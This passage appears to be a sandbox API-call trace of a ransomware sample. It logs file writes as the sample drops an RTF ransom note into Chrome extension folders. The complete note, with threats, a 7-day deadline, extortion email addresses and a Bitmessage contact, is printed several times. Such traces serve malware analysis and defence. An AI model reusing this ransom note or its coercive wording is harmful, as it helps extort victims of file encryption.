https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.263] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nxà­Å(\x177\x16\x8fØQ¨nL\x0bÍQ\x07FôÁÓDÓÎ\x01", lpUsedDefaultChar=0x0) returned 8717 [0280.263] WriteFile (in: hFile=0x2c8, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.264] CloseHandle (hObject=0x2c8) returned 1 [0280.264] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\#readme_eman#.rtf")) returned 0x20 [0280.264] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\#readme_eman#.rtf")) returned 0xffffffff [0280.264] GetLastError () returned 0x2 [0280.264] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0280.265] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 